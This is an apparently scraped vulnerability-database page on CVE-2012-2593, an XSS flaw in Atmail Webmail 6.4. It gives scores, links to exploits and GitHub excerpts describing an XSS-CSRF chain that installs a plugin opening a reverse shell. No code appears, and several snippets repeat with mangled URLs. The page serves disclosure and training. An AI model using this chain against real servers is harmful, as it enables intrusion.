Published: 06/02/2020 Updated: 10/02/2020

CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6

CVSS v3 Base Score: 6.1 | Impact Score: 2.7 | Exploitability Score: 2.8

VMScore: 437

Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

Cross-site scripting (XSS) vulnerability in the administrative interface in Atmail Webmail Server 6.4 allows remote malicious users to inject arbitrary web script or HTML via the Date field of an email.

Vulnerable Product	Search on Vulmon	Subscribe to Product
atmail atmail 6.4.0

###################################################################################### # Exploit Title: Atmail Email Server Appliance 64 Remote Code Execution # Date: Jul 21 2012 # Author: muts # Version: Atmail Email Server 64 # # By sending an email to a user with the Atmail administrative interface open, we # can call a remote JavaScript file ...

AWAE/OSWE Preparation for coming AWAE Training Work in progress Atmail Mail Server Appliance: from XSS to RCE (64) CVE-2012-2593 wwwexploit-dbcom/exploits/20009 githubcom/sourceincite/poc/blob/master/SRC-2016-0012py ATutor Authentication Bypass and RCE (221) CVE-2016-2555 Install: sourceforgenet/projects/atutor/files/atutor_2_2_1/

Atmail XSS-CSRF-RCE Exploit Chain

Atmail XSS-CSRF-RCE Exploit Chain PoC atmail-rcepy: Exploits CVE-2012-2593 in Atmail's webmail interface atmail-csrfjs: Javascript file which leverages CVE 2012-2593 into a CSRF to install a malicious plugin which executes a reverse shell Pluginphp: Atmail plugin to be installed which calls a reverse shell !!Only use against servers on which you have permission to test

OSWE Preparation

AWAE/OSWE Preparation for coming AWAE Training Work in progress Atmail Mail Server Appliance: from XSS to RCE (64) CVE-2012-2593 wwwexploit-dbcom/exploits/20009 githubcom/sourceincite/poc/blob/master/SRC-2016-0012py ATutor Authentication Bypass and RCE (221) CVE-2016-2555 Install: sourceforgenet/projects/atutor/files/atutor_2_2_1/

https://github.com/timip/OSWE

AWAE/OSWE Preparation for coming AWAE Training Work in progress Atmail Mail Server Appliance: from XSS to RCE (64) CVE-2012-2593 wwwexploit-dbcom/exploits/20009 githubcom/sourceincite/poc/blob/master/SRC-2016-0012py ATutor Authentication Bypass and RCE (221) CVE-2016-2555 Install: sourceforgenet/projects/atutor/files/atutor_2_2_1/

https://github.com/ManhNho/AWAE-OSWE

AWAE/OSWE Preparation for coming AWAE Training Work in progress Facebook discuss group wwwfacebookcom/groups/262623168007439 Course syllabus wwwoffensive-securitycom/documentation/awae-syllabuspdf Other resource Burpsuite how to? portswiggernet/burp/documentation Common web vulnerabilities portswiggernet/web-security Atmail Mai

my n00b notes on web_study

stop what you are doing and have a glance through this: wwwinfosecmattercom/bug-bounty-tips/ web_study my n00b notes on web_study The Single Page badge on PA doesnt tell you where the exercises are they are here A good list of "todo's" is here at mrb3n's blog To do: Portswigger labs will take you from 0 to hero LKWA ^^^ lab guide Hack the Box/ B

Do all these topics and learn advance web hacking as well prepare for OSWE.

AWAE/OSWE Preparation for coming AWAE Training Work in progress Atmail Mail Server Appliance: from XSS to RCE (64) CVE-2012-2593 wwwexploit-dbcom/exploits/20009 githubcom/sourceincite/poc/blob/master/SRC-2016-0012py ATutor Authentication Bypass and RCE (221) CVE-2016-2555 Install: sourceforgenet/projects/atutor/files/atutor_2_2_1/

CWE-79 http://www.securityfocus.com/bid/54630 http://www.exploit-db.com/exploits/20009 https://nvd.nist.gov https://www.exploit-db.com/exploits/20009/https://github.com/AndrewTrube/CVE-2012-2593

CVE-2012-2593

Vulnerability Summary

Vulnerability Trend

Exploits

Github Repositories

References

Vulmon Search

About

Products

Connect